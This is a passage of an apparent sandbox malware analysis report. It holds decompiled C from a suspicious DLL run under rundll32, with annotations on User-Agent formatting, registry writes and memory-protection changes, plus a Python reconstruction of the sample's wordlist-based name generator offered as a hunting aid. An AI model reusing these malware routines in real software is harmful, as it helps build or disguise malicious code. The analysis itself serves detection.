                							__eflags = _t37;
                							if(_t37 == 0) {
                								_push(8);
                								_pop(0);
                							} else {
                								_t57 =  *0x4b9a2fc; // 0x4000000a
                								_t62 = _t57 & 0x000000ff;
                								_t59 =  *0x4b9a348; // 0x56d5a8
                								_t13 = _t59 + 0x4b9b552; // 0x697a6f4d: bytes spell "Mozi", the start of a Mozilla-style User-Agent format string
                								_t56 = _t13;
                								wsprintfA(_t37, _t13, _t57 & 0x000000ff, _t57 & 0x000000ff, 0x4b99290); // the OS major version byte is substituted twice, plus a pointer argument at 0x4b99290
                							}
                							_t55 = 0;
                							__eflags = 0;
                							if(0 == 0) {
                								asm("sbb eax, eax");
                								E04B91F55( ~_v8 &  *0x4b9a310, 0x4b9a00c); // executed
                								_t43 = E04B94CAB(0, _t56, _t62, _t64, 0x4b9a00c); // executed
                								_t55 = _t43;
                								__eflags = _t55;
                								if(_t55 != 0) {
                									goto L30;
                								}
                								_t44 = E04B9775E(_t62); // executed
                								__eflags = _t44;
                								if(_t44 != 0) {
                									__eflags = _v8;
                									_t68 = _v12;
                									if(_v8 != 0) {
                										L29:
                										_t45 = E04B91898(_t62, _t68, _v8); // executed
                										_t55 = _t45;
                										goto L30;
                									}
                									__eflags = _t68;
                									if(__eflags == 0) {
                										goto L30;
                									}
                									_t55 = E04B9367F(__eflags,  &(_t68[4]));
                									__eflags = _t55;
                									if(_t55 == 0) {
                										goto L30;
                									}
                									goto L29;
                								}
                								_t55 = 8;
                							}
                						}
                					} else {
                						_t69 = _v12;
                						if(_t69 == 0) {
                							L30:
                							if(_v16 == 0 || _v16 == 1) {
                								 *0x4b9a17c(); // only reached when the earlier init returned S_OK or S_FALSE, which matches a balancing CoUninitialize
                							}
                							goto L34;
                						}
                						_t70 =  &(_t69[4]);
                						do {
                						} while (E04B958B9(_t64, _t70, 0, 1) == 0x4c7); // 0x4c7 = ERROR_CANCELLED: retried until the call stops reporting cancellation
                					}
                					goto L30;
                				} else {
                					_t55 = _t22;
                					L34:
                					return _t55;
                				}
                			}

                APIs
                  • Part of subcall function 04B973F3: GetModuleHandleA.KERNEL32(4C44544E,00000000,04B934B2,00000001), ref: 04B97402
                • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 04B9352F
                  • Part of subcall function 04B93832: GetVersionExA.KERNEL32(?,00000042,00000000), ref: 04B93856
                  • Part of subcall function 04B93832: wsprintfA.USER32 ref: 04B938BA
                  • Part of subcall function 04B96601: RtlAllocateHeap.NTDLL(00000000,00000000,04B964FD), ref: 04B9660D
                • memset.NTDLL ref: 04B93589
                • RtlInitializeCriticalSection.NTDLL(051095C0), ref: 04B9359A
                  • Part of subcall function 04B9367F: memset.NTDLL ref: 04B93699
                  • Part of subcall function 04B9367F: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 04B936DF
                  • Part of subcall function 04B9367F: StrCmpNIW.SHLWAPI(00000000,?,00000000), ref: 04B936EA
                • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 04B935C5
                • wsprintfA.USER32 ref: 04B935F5
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: AllocateHandleHeapmemsetwsprintf$CloseCriticalInitializeModuleSectionVersionlstrlen
                • String ID:
                • API String ID: 1825273115-0
                • Opcode ID: bbee4f509f342f06bc6aab0ff5ecbc920d68dadc8828934d372cbc28f6623bf8
                • Instruction ID: eb85b2d31187519a4bfd3e2933887f0777a7ed1b13ec843558e1be6f3c218b00
                • Opcode Fuzzy Hash: bbee4f509f342f06bc6aab0ff5ecbc920d68dadc8828934d372cbc28f6623bf8
                • Instruction Fuzzy Hash: 9F51D671A08215ABEF21AFB4DD95F6E37E8EB0D704F1058B6E901D7240EB79BD448B60
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 22%
                			E04B96616(signed int __eax, signed int _a4, signed int _a8) {
                				signed int _v8;
                				signed int _v12;
                				intOrPtr _v16;
                				signed int _v20;
                				intOrPtr _t81;
                				char _t83;
                				signed int _t90;
                				signed int _t97;
                				signed int _t99;
                				char _t101;
                				unsigned int _t102;
                				intOrPtr _t103;
                				char* _t107;
                				signed int _t110;
                				signed int _t113;
                				signed int _t118;
                				signed int _t122;
                				intOrPtr _t124;
                
                				_t102 = _a8;
                				_t118 = 0;
                				_v20 = __eax;
                				_t122 = (_t102 >> 2) + 1;
                				_v8 = 0;
                				_a8 = 0;
                				_t81 = E04B96601(_t122 << 2);
                				_v16 = _t81;
                				if(_t81 == 0) {
                					_push(8);
                					_pop(0);
                					L37:
                					return 0;
                				}
                				_t107 = _a4;
                				_a4 = _t102;
                				_t113 = 0;
                				while(1) {
                					_t83 =  *_t107;
                					if(_t83 == 0) {
                						break;
                					}
                					if(_t83 == 0xd || _t83 == 0xa) {
                						if(_t118 != 0) {
                							if(_t118 > _v8) {
                								_v8 = _t118;
                							}
                							_a8 = _a8 + 1;
                							_t118 = 0;
                						}
                						 *_t107 = 0;
                						goto L16;
                					} else {
                						if(_t118 != 0) {
                							L10:
                							_t118 = _t118 + 1;
                							L16:
                							_t107 = _t107 + 1;
                							_t15 =  &_a4;
                							 *_t15 = _a4 - 1;
                							if( *_t15 != 0) {
                								continue;
                							}
                							break;
                						}
                						if(_t113 == _t122) {
                							L21:
                						if(_a8 <= 0x20) { // _a8 now holds the number of words found; a list of 32 or fewer entries is rejected
                							_push(0xb); // 0xb = ERROR_BAD_FORMAT
                								L34:
                								_pop(0);
                								L35:
                								E04B94130(_v16);
                								goto L37;
                							}
                							_t24 = _v8 + 5; // 0xcdd8d2f8
                							_t103 = E04B96601((_v8 + _t24) * _a8 + 4);
                							if(_t103 == 0) {
                								_push(8);
                								goto L34;
                							}
                							_t90 = _a8;
                							_a4 = _a4 & 0x00000000;
                							_v8 = _v8 & 0x00000000;
                							_t124 = _t103 + _t90 * 4;
                							if(_t90 <= 0) {
                								L31:
                								 *0x4b9a318 = _t103;
                								goto L35;
                							}
                							do {
                							_t110 = 0x3c6ef35f + _v20 * 0x19660d; // 32-bit LCG x = x*0x19660d + 0x3c6ef35f (the Numerical Recipes constants); two draws per generated name, each reduced mod the word count below
                							_v20 = 0x3c6ef35f + _t110 * 0x19660d;
                								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
                								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
                								_v12 = _v12 & 0x00000000;
                								if(_a4 <= 0) {
                									goto L30;
                								} else {
                									goto L26;
                								}
                								while(1) {
                									L26:
                									_t99 = _v12;
                									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
                									if(_t99 == 0) {
                										break;
                									}
                									_v12 = _v12 + 1;
                									if(_v12 < _a4) {
                										continue;
                									}
                									goto L30;
                								}
                								_v8 = _v8 - 1;
                								L30:
                								_t97 = _a4;
                								_a4 = _a4 + 1;
                								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
                								__imp__(_t124);
                								_v8 = _v8 + 1;
                								_t124 = _t124 + _t97 + 1;
                							} while (_v8 < _a8);
                							goto L31;
                						}
                						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
                						_t101 = _t83;
                					if(_t83 - 0x61 <= 0x19) { // 'a'..'z': upper-case the first letter of each word
                						_t101 = _t101 - 0x20;
                						}
                						 *_t107 = _t101;
                						_t113 = _t113 + 1;
                						goto L10;
                					}
                				}
                				if(_t118 != 0) {
                					if(_t118 > _v8) {
                						_v8 = _t118;
                					}
                					_a8 = _a8 + 1;
                				}
                				goto L21;
                			}

                APIs
                  • Part of subcall function 04B96601: RtlAllocateHeap.NTDLL(00000000,00000000,04B964FD), ref: 04B9660D
                • lstrcpy.KERNEL32(69B25F45,00000020), ref: 04B96713
                • lstrcat.KERNEL32(69B25F45,00000020), ref: 04B96728
                • lstrcmp.KERNEL32(00000000,69B25F45), ref: 04B9673F
                • lstrlen.KERNEL32(69B25F45), ref: 04B96763
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                • String ID:
                • API String ID: 3214092121-3916222277
                • Opcode ID: 7075c7e3c731ab93d3f378d20d4463a53896d620cd5a42305099c05564b628e3
                • Instruction ID: 4b8f037de60b7b11fc505543d480a6cd6d7472bbb2dec515ecfea28bd501dbaf
                • Opcode Fuzzy Hash: 7075c7e3c731ab93d3f378d20d4463a53896d620cd5a42305099c05564b628e3
                • Instruction Fuzzy Hash: B0517B71A00218EBDF218FA9C5847EDBBF6EF45314F1580AAE815AB211C735BE51CB90
                Uniqueness

                Uniqueness Score: -1.00%
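The second loop of E04B96616 above is a wordlist-driven name generator: the input is split on CR/LF, each word gets a capitalised first letter, and names are built by joining two words picked with consecutive draws of a 32-bit LCG, with lstrcmp rejecting a name already in the table. The Python below is an added analyst aid reconstructed from that listing; it is not code from this report or from the sample. The 40-word list is constructed for the demonstration, and treating a duplicate as "draw again" is an assumption, since the 22%-quality decompile of the lstrcmp branch is ambiguous.

```python
import re

# LCG constants taken from the decompiled E04B96616 listing above (the
# Numerical Recipes multiplier/increment); the state is a 32-bit register.
LCG_MULT = 0x19660D
LCG_INC = 0x3C6EF35F
MASK32 = 0xFFFFFFFF

# The listing returns 0xb (ERROR_BAD_FORMAT) when the word count is <= 0x20.
MIN_WORDS = 0x20


def lcg_next(state: int) -> int:
    """One step of x = x * 0x19660D + 0x3C6EF35F (mod 2^32)."""
    return (state * LCG_MULT + LCG_INC) & MASK32


def split_wordlist(data: bytes) -> list:
    """Mirror the first loop of E04B96616: split on CR/LF, drop empty lines,
    and upper-case an initial 'a'..'z' (the listing subtracts 0x20 only when
    c - 0x61 <= 0x19)."""
    words = []
    for line in re.split(rb"[\r\n]+", data):
        if not line:
            continue
        first = line[:1]
        if b"a" <= first <= b"z":
            first = first.upper()
        words.append((first + line[1:]).decode("latin-1"))
    return words


def generate_names(seed: int, words: list, count=None) -> list:
    """Mirror the second loop: two LCG draws per name, each selecting
    words[draw % len(words)], joined as lstrcpy/lstrcat do. The sample
    produces len(words) names (the loop runs while _v8 < _a8).
    ASSUMPTION (not shown unambiguously by the decompile): a name that
    lstrcmp finds already in the table is discarded and the draw repeated."""
    n = len(words)
    if n <= MIN_WORDS:
        raise ValueError("ERROR_BAD_FORMAT: the wordlist needs more than 32 entries")
    if count is None:
        count = n
    state = seed & MASK32          # the value the sample passes in eax (_v20)
    names = []
    seen = set()
    while len(names) < count:
        first = lcg_next(state)    # _t110
        state = lcg_next(first)    # _v20, carried into the next name
        name = words[first % n] + words[state % n]
        if name in seen:
            continue
        seen.add(name)
        names.append(name)
    return names


if __name__ == "__main__":
    # Constructed wordlist for the demonstration, not recovered from the sample.
    sample_wordlist = b"\r\n".join(b"word%02d" % i for i in range(40))
    wl = split_wordlist(sample_wordlist)
    for name in generate_names(seed=0x1234, words=wl, count=5):
        print(name)
```

Given a wordlist recovered from the sample and the seed it passes in eax, this reproduces the table the sample stores at 0x4b9a318, which helps when hunting for files or registry values whose names were derived from the same list.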

                C-Code - Quality: 100%
                			E04B94202(void* __edx) {
                				void* _v8;
                				int _v12;
                				WCHAR* _v16;
                				void* __edi;
                				void* __esi;
                				void* _t23;
                				intOrPtr _t24;
                				void* _t26;
                				intOrPtr _t32;
                				intOrPtr _t35;
                				void* _t37;
                				intOrPtr _t38;
                				intOrPtr _t42;
                				void* _t45;
                				void* _t50;
                				void* _t52;
                
                				_t50 = __edx;
                				_v12 = 0;
                				_t23 = E04B91000(0,  &_v8); // executed
                				if(_t23 != 0) {
                					_v8 = 0;
                				}
                				_t24 =  *0x4b9a348; // 0x56d5a8
                				_t4 = _t24 + 0x4b9be30; // 0x51093d8
                				_t5 = _t24 + 0x4b9bdd8; // 0x4f0053: UTF-16 code units 'S','O', a wide string beginning "SO"
                				_t26 = E04B9405E( &_v16, _v8, _t5, _t4); // executed
                				_t45 = _t26;
                				if(_t45 == 0) {
                					StrToIntExW(_v16, 0,  &_v12);
                					_t45 = 8;
                					if(_v12 < _t45) {
                						_t45 = 1;
                						__eflags = 1;
                					} else {
                						_t32 =  *0x4b9a348; // 0x56d5a8
                						_t11 = _t32 + 0x4b9be24; // 0x51093cc
                						_t48 = _t11;
                						_t12 = _t32 + 0x4b9bdd8; // 0x4f0053
                						_t52 = E04B917A4(_t11, _t12, _t11);
                						_t59 = _t52;
                						if(_t52 != 0) {
                							_t35 =  *0x4b9a348; // 0x56d5a8
                							_t13 = _t35 + 0x4b9be6e; // 0x30314549: bytes spell "IE10"; passed with length 0x14
                							_t37 = E04B92F4B(_t48, _t50, _t59, _v8, _t52, _t13, 0x14); // executed
                							if(_t37 == 0) {
                								_t61 =  *0x4b9a2fc - 6;
                								if( *0x4b9a2fc <= 6) {
                									_t42 =  *0x4b9a348; // 0x56d5a8
                									_t15 = _t42 + 0x4b9bdba; // 0x52384549: bytes spell "IE8R"; only used when the version byte is <= 6
                									E04B92F4B(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
                								}
                							}
                							_t38 =  *0x4b9a348; // 0x56d5a8
                							_t17 = _t38 + 0x4b9be68; // 0x5109410
                							_t18 = _t38 + 0x4b9be40; // 0x680043
                							_t45 = E04B94AA9(_v8, 0x80000001, _t52, _t18, _t17); // 0x80000001 = HKEY_CURRENT_USER
                							HeapFree( *0x4b9a2d8, 0, _t52);
                						}
                					}
                					HeapFree( *0x4b9a2d8, 0, _v16);
                				}
                				_t54 = _v8;
                				if(_v8 != 0) {
                					E04B95D72(_t54);
                				}
                				return _t45;
                			}

                APIs
                • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,051093D8,00000000,?,746AF710,00000000,746AF730), ref: 04B94251
                • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,05109410,?,00000000,30314549,00000014,004F0053,051093CC), ref: 04B942EE
                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,04B91939), ref: 04B94300
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: FreeHeap
                • String ID: Uet
                • API String ID: 3298025750-2766386878
                • Opcode ID: 2c8363352e25b0039b32cf13ce7e31a48444309104dc759b9e88ece49de46a81
                • Instruction ID: db455883284f47af2052fd581a9359b6c6011b40e6983bd47fbc9b67abc0c88c
                • Opcode Fuzzy Hash: 2c8363352e25b0039b32cf13ce7e31a48444309104dc759b9e88ece49de46a81
                • Instruction Fuzzy Hash: 6C31D072A04158BFEF11DBA4DD84E9A3BFCFB08700F1501E6A60097021DA71BE49DB60
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 87%
                			E00401152(void* __eax, void* _a4) {
                				signed int _v8;
                				signed int _v12;
                				signed int _v16;
                				long _v20;
                				int _t43;
                				long _t54;
                				signed int _t57;
                				void* _t58;
                				signed int _t60;
                
                				_v12 = _v12 & 0x00000000;
                				_t57 =  *0x4041c0;
                				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
                				_v16 =  *(__eax + 6) & 0x0000ffff;
                				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x69b25f40,  &_v20); // executed
                				_v8 = _v8 & 0x00000000;
                				if(_v16 <= 0) {
                					L12:
                					return _v12;
                				} else {
                					goto L1;
                				}
                				while(1) {
                					L1:
                					_t60 = _v12;
                					if(_t60 != 0) {
                						goto L12;
                					}
                					asm("bt [esi+0x24], eax");
                					if(_t60 >= 0) {
                						asm("bt [esi+0x24], eax");
                						if(__eflags >= 0) {
                							L8:
                							_t54 = _t57 - 0x69b25f40;
                							L9:
                							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
                							if(_t43 == 0) {
                								_v12 = GetLastError();
                							}
                							_v8 = _v8 + 1;
                							_t58 = _t58 + 0x7c211d88 + _t57 * 0x28;
                							if(_v8 < _v16) {
                								continue;
                							} else {
                								goto L12;
                							}
                						}
                						asm("bt [esi+0x24], eax");
                						_t54 = _t57 - 0x69b25f42;
                						if(__eflags >= 0) {
                							goto L9;
                						}
                						goto L8;
                					}
                					asm("bt [esi+0x24], eax");
                					if(_t60 >= 0) {
                						_t54 = _t57 - 0x69b25f24;
                					} else {
                						_t54 = _t57 - 0x69b25f04;
                					}
                					goto L9;
                				}
                				goto L12;
                			}

                APIs
                • VirtualProtect.KERNEL32(00000000,?,?,?), ref: 0040118B
                • VirtualProtect.KERNEL32(00000000,?,?,?), ref: 00401200
                • GetLastError.KERNEL32 ref: 00401206
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.772858037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000003.00000002.772848945.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.772865794.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.772877043.0000000000405000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.772888672.0000000000406000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_400000_rundll32.jbxd
                Similarity
                • API ID: ProtectVirtual$ErrorLast
                • String ID: @Met`fet MetTet
                • API String ID: 1469625949-3757152079
                • Opcode ID: 744d0af4141fe2b95fa11f896430a499ee11c5ca76440e274f46983cbb69f918
                • Instruction ID: f8590dcbed9c632339c19ca0b31eb8342a07c130e52ee45ae9f22e0d377e236d
                • Opcode Fuzzy Hash: 744d0af4141fe2b95fa11f896430a499ee11c5ca76440e274f46983cbb69f918
                • Instruction Fuzzy Hash: CD21627190020AEFCB18CF95C9859BAF7F4FF18345F01446AD202EB159E374A665CB58
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SysAllocString.OLEAUT32(80000002), ref: 04B93353
                • SysAllocString.OLEAUT32(04B94515), ref: 04B93397
                • SysFreeString.OLEAUT32(00000000), ref: 04B933AB
                • SysFreeString.OLEAUT32(00000000), ref: 04B933B9
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: String$AllocFree
                • String ID:
                • API String ID: 344208780-0
                • Opcode ID: 9759be3d9bdae3da1c23f48534fa686f9d14ab0b5d34f143432dcfbf20ad4953
                • Instruction ID: 52d192db9cf70fd0c2cc652de088939f26f0c52108c25335f50a3370c7e5c9bd
                • Opcode Fuzzy Hash: 9759be3d9bdae3da1c23f48534fa686f9d14ab0b5d34f143432dcfbf20ad4953
                • Instruction Fuzzy Hash: B1310B71948209EFCF05CFA8D8C09AE7BF9FF48340B10946EE90697250DB35AD85CB61
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 65%
                			E04B96599(void* __ecx, intOrPtr _a4) {
                				struct _FILETIME _v12;
                				int _t13;
                				signed int _t16;
                				void* _t17;
                				signed int _t18;
                				unsigned int _t22;
                				void* _t30;
                				signed int _t34;
                
                				_v12.dwLowDateTime = _v12.dwLowDateTime & 0x00000000;
                				asm("stosd");
                				do {
                					_t13 = SwitchToThread();
                					GetSystemTimeAsFileTime( &_v12);
                					_t22 = _v12.dwHighDateTime;
                					_t16 = (_t22 << 0x00000020 | _v12.dwLowDateTime) >> 5;
                					_push(0);
                					_push(0x13);
                					_push(_t22 >> 5);
                					_push(_t16);
                					L04B984D6();
                					_t34 = _t16 + _t13;
                					_t17 = E04B96470(_a4, _t34);
                					_t30 = _t17;
                					_t18 = 3;
                					Sleep(_t18 << (_t34 & 0x00000007)); // executed
                				} while (_t30 == 1);
                				return _t30;
                			}

                APIs
                • SwitchToThread.KERNEL32(?,00000001,?,?,?,04B96921,?,?), ref: 04B965AA
                • GetSystemTimeAsFileTime.KERNEL32(00000000,?,00000001,?,?,?,04B96921,?,?), ref: 04B965B6
                • _aullrem.NTDLL(00000000,?,00000013,00000000), ref: 04B965CF
                  • Part of subcall function 04B96470: memcpy.NTDLL(00000000,00000002,?,?,?,00000000,00000000), ref: 04B9650F
                • Sleep.KERNEL32(00000003,00000000,?,00000001,?,?,?,04B96921,?,?), ref: 04B965EE
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: Time$FileSleepSwitchSystemThread_aullremmemcpy
                • String ID:
                • API String ID: 1610602887-0
                • Opcode ID: 922570a4020924a2b20e92114d15a32092201de8e5bf0f4c941d4230e8f56df2
                • Instruction ID: eddb23ed5836fd1baf7083e1965e8460a0985900207de3ddaeae1afba0f5acb5
                • Opcode Fuzzy Hash: 922570a4020924a2b20e92114d15a32092201de8e5bf0f4c941d4230e8f56df2
                • Instruction Fuzzy Hash: E8F0A4B7A502087BDB149AA4CC1EBDF77B9DB84365F110165E601E7340E9B8AE0186A0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 87%
                			E00401108(void* __ecx, char _a4) {
                				long _t3;
                				int _t4;
                				int _t9;
                				void* _t13;
                
                				_t13 = GetCurrentThread();
                				_t3 = SetThreadAffinityMask(_t13, 1); // executed
                				if(_t3 != 0) {
                					SetThreadPriority(_t13, 0xffffffff); // executed
                				}
                				_t4 = E00401C21(_a4); // executed
                				_t9 = _t4;
                				if(_t9 == 0) {
                					SetThreadPriority(_t13, _t4);
                				}
                				asm("lock xadd [eax], ecx");
                				return _t9;
                			}

                APIs
                • GetCurrentThread.KERNEL32 ref: 0040110B
                • SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 00401116
                • SetThreadPriority.KERNEL32(00000000,000000FF), ref: 00401129
                • SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 0040113C
                Memory Dump Source
                • Source File: 00000003.00000002.772858037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000003.00000002.772848945.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.772865794.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.772877043.0000000000405000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.772888672.0000000000406000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_400000_rundll32.jbxd
                Similarity
                • API ID: Thread$Priority$AffinityCurrentMask
                • String ID:
                • API String ID: 1452675757-0
                • Opcode ID: a514c98b64dad05162456f6bf13927b0d65a568c4b193775e3dc7ee30ab04a63
                • Instruction ID: 761571612bcd71f71f529ca26549820a74ebf55ca0307cbc8449af1630cff5f1
                • Opcode Fuzzy Hash: a514c98b64dad05162456f6bf13927b0d65a568c4b193775e3dc7ee30ab04a63
                • Instruction Fuzzy Hash: 68E092713063112BE2113F295C84E6B6B5CEF963317050236F620B62E4CB788D0595AD
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.773208004.0000000000BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_bb0000_rundll32.jbxd
                Similarity
                • API ID: ProtectVirtual
                • String ID: X
                • API String ID: 544645111-3081909835
                • Opcode ID: d094a36c1d17c3c370052c8345119ec93922f320f2933c8fbd83f2a3a5e1a2fa
                • Instruction ID: 456bdc474b7e6b5a6bd17401423946863ec1f1ef5ea6baa890ce146db8263ea0
                • Opcode Fuzzy Hash: d094a36c1d17c3c370052c8345119ec93922f320f2933c8fbd83f2a3a5e1a2fa
                • Instruction Fuzzy Hash: CA81CBB4E002188FDB58CF99C890A9DFBF1FF48310F2585AAE948AB351D774A985CF50
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E04B92F4B(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
                				struct _FILETIME _v12;
                				void* _t11;
                				short _t19;
                				void* _t21;
                				void* _t22;
                				void* _t24;
                				void* _t25;
                				short* _t26;
                
                				_t24 = __edx;
                				_t25 = E04B92EAF(_t11, _a12);
                				if(_t25 == 0) {
                					_t22 = 8;
                				} else {
                					_t26 = _t25 + _a16 * 2;
                					 *_t26 = 0;
                					_t22 = E04B91C12(__ecx, _a4, _a8, _t25);
                					if(_t22 == 0) {
                						GetSystemTimeAsFileTime( &_v12);
                						_t19 = 0x5f;
                						 *_t26 = _t19;
                						_t21 = E04B92331(_t24, _a4, 0x80000001, _a8, _t25,  &_v12, 8); // executed
                						_t22 = _t21;
                					}
                					HeapFree( *0x4b9a2d8, 0, _t25);
                				}
                				return _t22;
                			}

                APIs
                  • Part of subcall function 04B92EAF: lstrlen.KERNEL32(?,00000000,05109D00,00000000,04B977C5,05109F23,69B25F44,?,?,?,?,69B25F44,00000005,04B9A00C,4D283A53,?), ref: 04B92EB6
                  • Part of subcall function 04B92EAF: mbstowcs.NTDLL ref: 04B92EDF
                  • Part of subcall function 04B92EAF: memset.NTDLL ref: 04B92EF1
                • GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,74655520,00000008,00000014,004F0053,051093CC), ref: 04B92F83
                • HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,74655520,00000008,00000014,004F0053,051093CC), ref: 04B92FB1
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
                • String ID: Uet
                • API String ID: 1500278894-2766386878
                • Opcode ID: 040b874adfb5905ca92df0c608542de55f0ec3e69136c848b917bef75bb11dd2
                • Instruction ID: 889771ff31f59b1aef5fe2917aba7848491409e0c486dedaa1412b3c4fd9b48b
                • Opcode Fuzzy Hash: 040b874adfb5905ca92df0c608542de55f0ec3e69136c848b917bef75bb11dd2
                • Instruction Fuzzy Hash: 2801B135600209BBEF216FA49C44F9F7BB8EF84704F00447AFA009B150EA71ED649760
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 47%
                			E04B91653(char* _a4, char** _a8) {
                				char* _t7;
                				char* _t11;
                				char* _t14;
                				char* _t16;
                				char* _t17;
                				char _t18;
                				signed int _t20;
                				signed int _t22;
                
                				_t16 = _a4;
                				_push(0x20);
                				_t20 = 1;
                				_push(_t16);
